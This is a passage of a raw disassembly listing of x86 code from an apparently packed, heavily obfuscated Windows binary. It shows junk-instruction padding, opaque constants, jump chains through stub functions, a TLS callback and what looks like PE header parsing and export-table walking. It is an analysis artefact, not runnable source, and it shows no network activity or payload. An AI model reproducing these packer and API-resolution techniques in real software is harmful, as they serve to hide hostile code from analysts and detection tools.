; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FF81 proc near ; CODE XREF: sub_42ED88-A94�p
; sub_42ED88+23CA�p
push ebp
mov ebp, esp
jmp sub_42EA85
sub_42FF81 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43094F
loc_42FF89: ; CODE XREF: sub_43094F:loc_431BCE�j
shl eax, 3
add [ebp-8], eax
mov eax, [ebp-8]
jmp loc_4326C1
; ---------------------------------------------------------------------------
loc_42FF97: ; CODE XREF: sub_43094F:loc_430971�j
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jnz loc_431288
mov eax, [ebp-8]
jmp loc_432647
; END OF FUNCTION CHUNK FOR sub_43094F
; ---------------------------------------------------------------------------
loc_42FFAB: ; DATA XREF: sub_42E32F-20E�o
mov al, [ebp-5]
pop ecx
pop ecx
pop ebp
jmp loc_430084
; ---------------------------------------------------------------------------
loc_42FFB6: ; CODE XREF: j8.b78ws:loc_4310AD�j
jnz loc_430D84
; START OF FUNCTION CHUNK FOR sub_430C91
loc_42FFBC: ; CODE XREF: sub_430C91:loc_42FA76�j
jmp loc_42F9BD
; END OF FUNCTION CHUNK FOR sub_430C91
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_15. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42FFC2: ; CODE XREF: j8.b78ws:0042EE15�j
jmp loc_430E39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E487
loc_42FFC7: ; CODE XREF: sub_42E487-1F1�j
jmp loc_430C3B
; END OF FUNCTION CHUNK FOR sub_42E487
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42FFCD proc near ; CODE XREF: sub_430B0E+F�p
; sub_4315A4+13�p ...
; FUNCTION CHUNK AT 0042E785 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ECD4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042EEF1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004308FD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00430CD7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00430E54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004315FC SIZE 0000001A BYTES
xor bx, bx
add ebx, 10000h
loc_42FFD6: ; CODE XREF: sub_42E4AA+2D4�j
; sub_42EBA9+1D�j
jo loc_4315FC
push offset loc_4304A4
jmp j_nullsub_16
sub_42FFCD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov ebx, [esi]
jmp sub_432806
; ---------------------------------------------------------------------------
adc edi, 0E5308031h
jmp sub_4326CB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4320D1
loc_42FFF8: ; CODE XREF: sub_4320D1:loc_4303E7�j
jnz loc_43257C
mov eax, [ebp+8]
or dword ptr [eax-8], 8
jmp loc_43257C
; ---------------------------------------------------------------------------
loc_43000A: ; CODE XREF: sub_431A7B+18�j
; sub_4320D1+8�j
call sub_43237F
loc_43000F: ; CODE XREF: sub_4313E5-895�j
jmp loc_4302CA
; END OF FUNCTION CHUNK FOR sub_4320D1
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_430014 proc near ; CODE XREF: sub_42E796-217�j
jmp sub_432702
sub_430014 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_430019: ; CODE XREF: sub_43119E-9BD�j
call sub_432702
push eax
rol eax, 0Ch
mov ds:dword_4300B0, eax
jmp nullsub_29
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_43002D: ; CODE XREF: sub_4314D8+AAF�j
rol ebp, 19h
and ebx, eax
jo loc_42FEF2
loc_430038: ; CODE XREF: sub_4314D8:loc_432298�j
push 0AF17C903h
jmp loc_42EEC9
; END OF FUNCTION CHUNK FOR sub_4314D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5CA
loc_430042: ; CODE XREF: sub_42E5CA+C�j
; j8.b78ws:00430260�j
inc dword ptr [ebp-18h]
dec dword ptr [ebp-1Ch]
jnz loc_4319B0
jmp loc_431C55
; END OF FUNCTION CHUNK FOR sub_42E5CA
; =============== S U B R O U T I N E =======================================
sub_430053 proc near ; CODE XREF: j8.b78ws:0042E510�p
; sub_42E5CA+4�p ...
; FUNCTION CHUNK AT 0042FB2C SIZE 00000013 BYTES
push ebp
jmp loc_42FB2C
sub_430053 endp
; =============== S U B R O U T I N E =======================================
sub_430059 proc near ; DATA XREF: sub_42E5A2:loc_432736�o
push eax
loc_43005A: ; DATA XREF: .packed:0041A720�o
call sub_430A1F
sub_430059 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4308AB
loc_43005F: ; CODE XREF: sub_4308AB+1B1F�j
ja loc_431890
loc_430065: ; CODE XREF: j8.b78ws:0042FE28�j
jmp loc_431D14
; END OF FUNCTION CHUNK FOR sub_4308AB
; ---------------------------------------------------------------------------
popf
jmp loc_42E9A7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_55. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43267C
loc_430071: ; CODE XREF: sub_43267C+A�j
jmp loc_430DF1
; END OF FUNCTION CHUNK FOR sub_43267C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E873
loc_430076: ; CODE XREF: sub_42E873+E�j
jmp loc_43241E
; END OF FUNCTION CHUNK FOR sub_42E873
; ---------------------------------------------------------------------------
db 8Ah
dword_43007C dd 0E407F413h ; j8.b78ws:00431FB8�w
dd 41A65CBEh
; ---------------------------------------------------------------------------
loc_430084: ; CODE XREF: j8.b78ws:0042FFB1�j
jmp locret_42FBCD
; ---------------------------------------------------------------------------
db 92h, 42h, 0E9h
dword_43008C dd 6B41F200h ; j8.b78ws:loc_42FA4D�w ...
; ---------------------------------------------------------------------------
loc_430090: ; CODE XREF: j8.b78ws:00432632�j
jmp sub_42E755
; ---------------------------------------------------------------------------
db 4Ch, 71h, 0E9h
dword_430098 dd 699EF901h ; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_43009C: ; CODE XREF: sub_43119E-10C7�j
jmp loc_42FE7A
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
db 6Dh, 80h, 3Eh
dword_4300A4 dd 1FE32F90h ; ---------------------------------------------------------------------------
loc_4300A8: ; CODE XREF: j8.b78ws:0042E8C5�j
jmp loc_42FC9E
; ---------------------------------------------------------------------------
db 85h, 0Dh, 8Dh
dword_4300B0 dd 0FD2D7C8h ; j8.b78ws:004303F8�r
dword_4300B4 dd 0A2F90173h ; sub_431A2C+7�w
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_53. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4300B9: ; CODE XREF: sub_4320AE+8�j
; sub_43119E+15BF�j
ror eax, 0Ch
call sub_4321C5
push 885ACDDFh
pop edx
add edx, 4E5A33Eh
call sub_432702
push 67309FCEh
jmp loc_43009C
; END OF FUNCTION CHUNK FOR sub_43119E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_12. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4300DD: ; CODE XREF: j8.b78ws:00430697�j
jmp loc_4300FE
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4300E2 proc near ; CODE XREF: sub_42FC13+F�j
jmp sub_432300
sub_4300E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4300E7 proc near ; CODE XREF: sub_4301B9-129F�j
jmp sub_43223F
sub_4300E7 endp
; =============== S U B R O U T I N E =======================================
sub_4300EC proc near ; CODE XREF: sub_430361+F�p
; j8.b78ws:00431B6B�j
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
add edi, 0BFB4A37Bh
xchg edi, [esp-4+arg_0]
jmp sub_4302E0
sub_4300EC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4300FE: ; CODE XREF: j8.b78ws:loc_4300DD�j
push esi
push edi
push ecx
mov ecx, ebx
xchg ecx, [esp]
push ecx
mov eax, esp
push 0
jmp loc_42E59D
; =============== S U B R O U T I N E =======================================
sub_430110 proc near ; CODE XREF: sub_430CB3+3�p
; j8.b78ws:00431B43�j
xchg ecx, [esp+0]
pop ecx
add esp, 0FFFFFFF8h
mov [ebp-4], eax
mov eax, [ebp-4]
mov [ebp-8], eax
push offset loc_42E9FE
jmp nullsub_17
sub_430110 endp
; ---------------------------------------------------------------------------
or edi, 99557EDFh
jmp loc_430E9A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F6D
loc_430135: ; CODE XREF: sub_431F6D:loc_43175E�j
jnz loc_42E275
jmp loc_42F86C
; END OF FUNCTION CHUNK FOR sub_431F6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F832
loc_430140: ; CODE XREF: sub_42F832+18�j
mov [ebp-20h], eax
jmp loc_42ED83
; END OF FUNCTION CHUNK FOR sub_42F832
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430148 proc near ; CODE XREF: sub_42F832+12�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0042EEB0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00430882 SIZE 0000001B BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
jmp loc_430882
sub_430148 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43038C
loc_430159: ; CODE XREF: sub_43038C-B7C�j
mov eax, [ebp+8]
cmp dword ptr [eax-4], 4
jnz loc_43016F
add dword ptr [ebp-8], 4
jmp loc_42F88E
; ---------------------------------------------------------------------------
loc_43016F: ; CODE XREF: sub_43038C-22C�j
add dword ptr [ebp-8], 2
jmp loc_42F819
; END OF FUNCTION CHUNK FOR sub_43038C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430178 proc near ; CODE XREF: sub_4301B9+249E�p
; sub_43267C+4�p
push ebp
mov ebp, esp
jmp sub_430223
sub_430178 endp
; =============== S U B R O U T I N E =======================================
sub_430180 proc near ; CODE XREF: sub_431D13�j
; DATA XREF: sub_43119E:loc_431D09�o
call sub_430CB3
pop ecx
push offset sub_431AF0
jmp nullsub_45
sub_430180 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9AD
loc_430190: ; CODE XREF: sub_42E9AD-5DA�j
jz loc_42FF42
and edx, edi
jmp loc_4305A8
; END OF FUNCTION CHUNK FOR sub_42E9AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E9DA
loc_43019D: ; CODE XREF: sub_42E9DA:loc_42E955�j
call sub_42FED3
loc_4301A2: ; CODE XREF: j8.b78ws:00431E11�j
jmp sub_42E8A6
; END OF FUNCTION CHUNK FOR sub_42E9DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_4301A7: ; CODE XREF: sub_430C91-1E2E�j
; sub_430C91:loc_42F9BD�j
mov eax, [ebp-4]
cmp dword ptr [eax+3Ch], 0
jz loc_430D84
jmp loc_42E528
; END OF FUNCTION CHUNK FOR sub_430C91
; =============== S U B R O U T I N E =======================================
sub_4301B9 proc near ; CODE XREF: sub_42EAFC+2D�j
; sub_42E3FA+3905�p
; FUNCTION CHUNK AT 0042EEFC SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004302CA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043079F SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00430B7B SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00430DF4 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0043104D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004310A3 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00432071 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043257C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00432654 SIZE 00000011 BYTES
xchg eax, [esp+0]
pop eax
jz loc_430DF4
push ebp
jmp loc_432654
sub_4301B9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C2C
loc_4301C9: ; CODE XREF: sub_430C2C-D40�j
; j8.b78ws:00432349�j
mov eax, [ebp-4]
mov al, [eax]
push offset loc_42E8B5
jmp nullsub_24
; END OF FUNCTION CHUNK FOR sub_430C2C
; ---------------------------------------------------------------------------
loc_4301D8: ; CODE XREF: j8.b78ws:0042FF69�j
add esi, 4DA32EB6h
; =============== S U B R O U T I N E =======================================
sub_4301DE proc near ; CODE XREF: sub_4316AB:loc_431E51�p
; FUNCTION CHUNK AT 0042E7AE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042ED7B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042EE9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430A92 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004324F1 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
mov esp, ebp
pop ebp
mov eax, ds:dword_43008C
or eax, eax
jmp loc_4324F1
sub_4301DE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_4301F2: ; CODE XREF: j8.b78ws:loc_431E64�j
retn
; ---------------------------------------------------------------------------
adc ebp, edx
jmp sub_4307EC
; ---------------------------------------------------------------------------
rol edx, 11h
jmp loc_4309ED
; ---------------------------------------------------------------------------
adc edx, 71228542h
jmp sub_42E2FE
; ---------------------------------------------------------------------------
loc_43020D: ; DATA XREF: sub_43119E-23B6�o
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
jnz loc_42E997
mov eax, [ebp+8]
push eax
jmp loc_430F60
; =============== S U B R O U T I N E =======================================
sub_430223 proc near ; CODE XREF: sub_430178+3�j
; FUNCTION CHUNK AT 0042E70E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431CED SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004321B4 SIZE 00000011 BYTES
add esp, 0FFFFFFECh
mov [ebp-4], eax
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
jmp loc_4321B4
sub_430223 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F6D
loc_430234: ; CODE XREF: sub_431F6D-2287�j
jz loc_42EAF7
jle loc_4316B4
jmp loc_42E25B
; END OF FUNCTION CHUNK FOR sub_431F6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4307FC
loc_430245: ; CODE XREF: sub_4307FC-EA4�j
or ecx, ecx
jz loc_431026
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
push offset loc_431ACB
jmp nullsub_20
; END OF FUNCTION CHUNK FOR sub_4307FC
; ---------------------------------------------------------------------------
loc_43025D: ; CODE XREF: j8.b78ws:00431182�j
cmp eax, [ebp-8]
jnz loc_430042
mov eax, [ebp-14h]
push offset loc_4324E2
jmp locret_42FF48
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430273 proc near ; CODE XREF: sub_43119E�p
; FUNCTION CHUNK AT 0042E19C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042E523 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FDE5 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004316DE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00431A3F SIZE 00000008 BYTES
mov [esp+0], ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_4300B4
jmp loc_42E19C
sub_430273 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E14A
loc_430287: ; CODE XREF: sub_42E14A:loc_42E150�j
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
cmp ds:dword_42EF3C[eax*4], 0
call sub_4322A3
loc_43029A: ; CODE XREF: j8.b78ws:0042E92F�j
jmp loc_43059B
; END OF FUNCTION CHUNK FOR sub_42E14A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43145D
loc_43029F: ; CODE XREF: sub_43145D:loc_42F797�j
call sub_430053
mov [ebp-8], eax
jmp loc_43059B
; END OF FUNCTION CHUNK FOR sub_43145D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4302AC proc near ; CODE XREF: sub_43145D-313B�p
; sub_4306C9+F05�p
; FUNCTION CHUNK AT 0042FABF SIZE 00000027 BYTES
push ebp
mov ebp, esp
push ecx
cmp ds:dword_42E0A4, 0
jmp loc_42FABF
sub_4302AC endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_52. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430DCF
loc_4302C2: ; CODE XREF: sub_430DCF:loc_4310CC�j
mov eax, [ebp-0Ch]
call sub_4302E0
; END OF FUNCTION CHUNK FOR sub_430DCF
; START OF FUNCTION CHUNK FOR sub_4301B9
loc_4302CA: ; CODE XREF: sub_43058C-1D84�j
; j8.b78ws:0042E924�j ...
mov eax, [ebp-0Ch]
mov esp, ebp
loc_4302CF: ; CODE XREF: j8.b78ws:0042ED40�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4301B9
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_73. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4302D6: ; CODE XREF: sub_43119E-26B8�j
jmp loc_431273
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
loc_4302DB: ; CODE XREF: j8.b78ws:0042E708�j
jmp locret_431A56
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4302E0 proc near ; CODE XREF: sub_42E1FD+13�p
; sub_43119E-2EC3�j ...
push ebp
mov ebp, esp
jmp sub_42EEA3
sub_4302E0 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_63. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E699
loc_4302E9: ; CODE XREF: sub_42E699:loc_4305CE�j
add eax, 0E7FED5ACh
call sub_42FDD9
loc_4302F4: ; DATA XREF: sub_42E12B+40D2�o
xchg ecx, [esp+0]
jmp nullsub_4
; END OF FUNCTION CHUNK FOR sub_42E699
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4302FC: ; CODE XREF: sub_43119E:loc_43124F�j
xor eax, eax
loc_4302FE: ; CODE XREF: sub_430C91:loc_430F1C�j
mov [ebp-8], eax
loc_430301: ; CODE XREF: sub_43119E+1459�j
jnb loc_430556
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jmp loc_430541
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BA0
loc_430312: ; CODE XREF: sub_430BA0+A�j
jz loc_4314F8
jmp loc_432411
; END OF FUNCTION CHUNK FOR sub_430BA0
; ---------------------------------------------------------------------------
loc_43031D: ; CODE XREF: j8.b78ws:0043155C�j
and edx, 0E55B1D07h
; =============== S U B R O U T I N E =======================================
sub_430323 proc near ; CODE XREF: sub_43082D+E51�p
; FUNCTION CHUNK AT 0042FDCF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431DE9 SIZE 00000008 BYTES
mov [esp+0], esi
pop esi
mov edx, 0E5254649h
call sub_42EC54
mov ds:dword_42E06C, eax
loc_430336: ; CODE XREF: sub_43082D+E3A�j
; j8.b78ws:loc_431BD9�j ...
mov esp, ebp
jmp loc_42FDCF
sub_430323 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43033D: ; CODE XREF: j8.b78ws:0043091B�j
and edi, 5FFAB812h
; =============== S U B R O U T I N E =======================================
sub_430343 proc near ; CODE XREF: sub_430BA0+95D�p
; FUNCTION CHUNK AT 004326F8 SIZE 0000000A BYTES
mov [esp+0], edi
pop edi
mov edx, 0C231F698h
call sub_432702
push edx
mov [esp+0], eax
jmp loc_4326F8
sub_430343 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430D58
loc_43035A: ; CODE XREF: sub_430D58:loc_431840�j
mov ebp, esp
call sub_431F6D
; END OF FUNCTION CHUNK FOR sub_430D58
; =============== S U B R O U T I N E =======================================
sub_430361 proc near ; CODE XREF: sub_4321C5+5�p
mov [esp+0], edi
push 6A8F7499h
pop edi
and edi, 54AEFFE8h
call sub_4300EC
loc_430375: ; CODE XREF: sub_4301B9+24A7�j
jmp loc_430DF4
sub_430361 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_43037A: ; CODE XREF: sub_43119E-B1D�j
xchg ebx, edi
jge loc_42F7F6
loc_430382: ; CODE XREF: sub_43119E:loc_42F9B2�j
push offset loc_430629
jmp sub_430D53
; END OF FUNCTION CHUNK FOR sub_43119E
; =============== S U B R O U T I N E =======================================
sub_43038C proc near ; CODE XREF: j8.b78ws:004308ED�j
; j8.b78ws:00431189�p
; FUNCTION CHUNK AT 0042F806 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00430159 SIZE 0000001F BYTES
mov [esp+0], ebx
pop ebx
add esp, 0FFFFFFF8h
mov [ebp-4], eax
mov eax, [ebp-4]
jmp loc_42F806
sub_43038C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_43039E: ; CODE XREF: sub_4320AE:loc_42FA91�j
; sub_4320AE-D36�j ...
call sub_432300
push 77FF9448h
pop edx
add edx, 0BBF56017h
xor edx, 0C14C6E46h
jmp loc_431EB6
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430734
loc_4303BA: ; CODE XREF: sub_430734:loc_42E7C8�j
movzx eax, word ptr [eax]
shl eax, 2
mov edx, [ebp-14h]
mov edx, [edx+1Ch]
add edx, [ebp-4]
add eax, edx
mov eax, [eax]
jmp loc_42ED9E
; END OF FUNCTION CHUNK FOR sub_430734
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315E4
loc_4303D2: ; CODE XREF: sub_4315E4+13�j
add edx, 908D5455h
call sub_432250
loc_4303DD: ; CODE XREF: sub_4326CB+E�j
jmp loc_431161
; END OF FUNCTION CHUNK FOR sub_4315E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_4303E2: ; CODE XREF: sub_43119E+89�j
jmp loc_42E1E3
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4320D1
loc_4303E7: ; CODE XREF: sub_4320D1-1536�j
jmp loc_42FFF8
; END OF FUNCTION CHUNK FOR sub_4320D1
; ---------------------------------------------------------------------------
locret_4303EC: ; CODE XREF: j8.b78ws:0042F82D�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431E76
loc_4303ED: ; CODE XREF: sub_431E76+A�j
jmp loc_42F9CF
; END OF FUNCTION CHUNK FOR sub_431E76
; ---------------------------------------------------------------------------
loc_4303F2: ; DATA XREF: sub_431487+1�o
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
mov eax, ds:dword_4300B0
or eax, eax
jnz loc_431194
jmp loc_431DB3
; ---------------------------------------------------------------------------
loc_43040B: ; DATA XREF: sub_43157B-513�o
lea eax, [ebp-14h]
push eax
; START OF FUNCTION CHUNK FOR sub_42E857
loc_43040F: ; CODE XREF: sub_42E857+E�j
call sub_43178D
locret_430414: ; CODE XREF: sub_430C12-2990�j
retn
; END OF FUNCTION CHUNK FOR sub_42E857
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4310F6
loc_430415: ; CODE XREF: sub_4310F6+B�j
jmp loc_42E86F
; END OF FUNCTION CHUNK FOR sub_4310F6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA96
loc_43041A: ; CODE XREF: sub_42EA96+2A1F�j
pushf
loc_43041B: ; CODE XREF: sub_42EA96:loc_430673�j
push 22DB2209h
pop eax
xor eax, 8A0D123Bh
add eax, ebp
add eax, 5729CFC6h
mov eax, [eax]
jmp sub_42E140
; END OF FUNCTION CHUNK FOR sub_42EA96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_430436: ; CODE XREF: sub_4315A4+FB6�j
push offset sub_42E2AD
jmp loc_431CE8
; END OF FUNCTION CHUNK FOR sub_4315A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4320D1
loc_430440: ; CODE XREF: sub_4320D1-1716�j
push offset loc_430B80
jmp j_nullsub_54
; END OF FUNCTION CHUNK FOR sub_4320D1
; =============== S U B R O U T I N E =======================================
sub_43044A proc near ; CODE XREF: j8.b78ws:00430741�p
; j8.b78ws:00431D9B�j
xchg esi, [esp+0]
pop esi
mov eax, [ebp-4]
push eax
call sub_42E1FD
push offset loc_431234
jmp nullsub_96
sub_43044A endp
; ---------------------------------------------------------------------------
loc_430461: ; CODE XREF: j8.b78ws:0042EA54�j
rol ebx, 7
; =============== S U B R O U T I N E =======================================
sub_430464 proc near ; CODE XREF: sub_4315A4+EF5�p
xchg ecx, [esp+0]
pop ecx
jz loc_431271
push offset sub_42EACE
jmp loc_42EA33
sub_430464 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_430478 proc near ; CODE XREF: sub_42E8A6:loc_431D88�j
retn
sub_430478 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_430479: ; CODE XREF: sub_430C91:loc_43159A�j
jge loc_430EE9
jz loc_43192F
jmp loc_430EDD
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E174
loc_43048A: ; CODE XREF: sub_42E174:loc_431A5C�j
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
jmp loc_4316E3
; END OF FUNCTION CHUNK FOR sub_42E174
; ---------------------------------------------------------------------------
loc_4304A4: ; DATA XREF: sub_42FFCD+F�o
sub ebx, 10000h
mov eax, [ebx]
push offset loc_42EBC0
jmp locret_4313E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_4304B6: ; CODE XREF: sub_430C91:loc_43214D�j
add eax, 0E8786F75h
call sub_42E9DA
; END OF FUNCTION CHUNK FOR sub_430C91
; START OF FUNCTION CHUNK FOR sub_431AB0
loc_4304C1: ; CODE XREF: sub_431AB0+15�j
jmp loc_43138E
; END OF FUNCTION CHUNK FOR sub_431AB0
; =============== S U B R O U T I N E =======================================
sub_4304C6 proc near ; DATA XREF: sub_4320D1+18�o
mov eax, [ebp+8]
push eax
cmp dword ptr [ebp-14h], 5
setz al
call sub_430E65
jmp loc_431E5F
sub_4304C6 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_35. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_432702
loc_4304DC: ; CODE XREF: sub_432702+3�j
jmp loc_432086
; END OF FUNCTION CHUNK FOR sub_432702
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F41
loc_4304E1: ; CODE XREF: sub_431F41+C�j
jmp loc_431822
; END OF FUNCTION CHUNK FOR sub_431F41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430662
loc_4304E6: ; CODE XREF: sub_430662+1�j
jmp loc_431072
; END OF FUNCTION CHUNK FOR sub_430662
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4315A4
loc_4304EB: ; CODE XREF: sub_4315A4-172F�j
jmp loc_43225C
; END OF FUNCTION CHUNK FOR sub_4315A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA18
loc_4304F0: ; CODE XREF: sub_42EA18+B�j
jmp loc_430944
; END OF FUNCTION CHUNK FOR sub_42EA18
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4325FC
loc_4304F5: ; CODE XREF: sub_4325FC+C�j
cmp ds:byte_42F75C, 0
; END OF FUNCTION CHUNK FOR sub_4325FC
; START OF FUNCTION CHUNK FOR sub_4308AB
loc_4304FC: ; CODE XREF: sub_4308AB:loc_431884�j
jnz loc_431413
lea edx, [ebp-14h]
push offset sub_42E857
jmp nullsub_68
; END OF FUNCTION CHUNK FOR sub_4308AB
; =============== S U B R O U T I N E =======================================
sub_43050F proc near ; CODE XREF: TlsCallback_0:loc_42FDCA�p
; j8.b78ws:004314D3�j
; FUNCTION CHUNK AT 0042E81B SIZE 0000000A BYTES
xchg edx, [esp+0]
pop edx
mov eax, [ebp-20h]
call sub_42E825
pop ecx
